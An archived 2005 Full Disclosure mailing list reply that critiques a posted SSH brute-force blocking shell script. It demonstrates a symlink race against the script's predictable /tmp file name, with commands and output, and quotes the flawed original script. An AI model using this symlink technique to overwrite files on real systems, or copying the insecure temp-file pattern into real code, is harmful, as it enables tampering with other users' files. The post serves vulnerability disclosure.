Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SSH Bruteforce blocking script

From: Alejandro Barrera <abarrera () iron-gate net>
Date: Fri, 2 Sep 2005 10:03:57 +0200
Well, we apreciate your script although I would preffer to stay with my nice
bruteforcing attempts than to create an insecure temporary file bug:

ergosum@sparta:~$ cat test.sh
#!/bin/sh

SCRIPT_NAME=$(basename $0)
TMP_FILE="/tmp/${SCRIPT_NAME}.$$"

touch ${TMP_FILE}
echo "pwn3d" > ${TMP_FILE}
exit
ergosum@sparta:~$ cat data
pr0n g0ld collection: ....

ergosum@sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18359
ergosum@sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18361
ergosum@sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18362
ergosum@sparta:~$ ./test.sh
ergosum@sparta:~$ cat data
pwn3d



#!/bin/ksh
#
# ssh_brute_blocker
#
# 05/07/2004 15:05 - Michael L. Benjamin
#

 

SCRIPT_NAME=$(basename $0)
LOG_FILE="/var/log/secure"
DENY_FILE="/etc/hosts.deny"
TMP_FILE="/tmp/${SCRIPT_NAME}.$$"
INBOUND_IP=""
INLINE=""
GUESS_COUNT=0
PERMIT_GUESS=4

 

touch ${TMP_FILE}

 

while :
do

 

tail -10000 ${LOG_FILE} | grep "Failed password for illegal user" | awk
-F"from" {'print $2'} | awk {'print $1'} | uniq > ${TMP_FILE}


 
 
 


-- 
Alejandro Barrera GarcĂ­a-Orea
R&D Engineer
c/ Alcala 268 28027 Madrid
Office: +34 91 326 66 11
Fax: +34 91 326 66 11
e-mail: abarrera () iron-gate net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: